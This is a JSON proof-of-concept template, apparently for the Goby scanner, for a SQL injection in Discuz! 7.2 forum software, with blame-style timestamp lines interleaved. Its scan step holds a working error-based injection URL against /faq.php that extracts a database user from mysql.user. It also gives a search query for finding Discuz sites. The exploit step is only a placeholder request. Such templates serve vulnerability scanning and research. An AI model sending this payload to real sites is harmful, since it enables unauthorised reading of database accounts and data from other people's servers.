2022-11-25 02:08:58 -08:00
{
"Name" : "Discuz v72 SQLI" ,
"Level" : "2" ,
"Tags" : [
"sqli"
] ,
2022-11-30 12:13:20 -08:00
"GobyQuery" : "app=\"Discuz\" || body=\"Powered by Discuz!\"" ,
"Description" : "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases." ,
"Product" : "Discuz!" ,
2022-11-25 02:08:58 -08:00
"Homepage" : "https://www.discuz.net/" ,
2022-11-30 12:13:20 -08:00
"Author" : "" ,
"Impact" : "Discuz7.2 has sql injection vulnerability." ,
2022-11-25 02:08:58 -08:00
"Recommendation" : "" ,
"References" : [
"https://blog.csdn.net/weixin_40709439/article/details/82780606"
] ,
2022-11-30 12:13:20 -08:00
"HasExp" : true ,
2022-11-25 02:08:58 -08:00
"ExpParams" : null ,
"ExpTips" : {
"Type" : "" ,
"Content" : ""
} ,
"ScanSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 " ,
"follow_redirect" : false ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "81dc9bdb52d04dc20036dbd8313ed055" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "Discuz! info</b>: MySQL Query Error" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
2022-11-30 12:13:20 -08:00
"ExploitSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/test.php" ,
"follow_redirect" : true ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "test" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
"PostTime" : "0000-00-00 00:00:00" ,
"GobyVersion" : "0.0.0"
2022-11-25 02:08:58 -08:00
}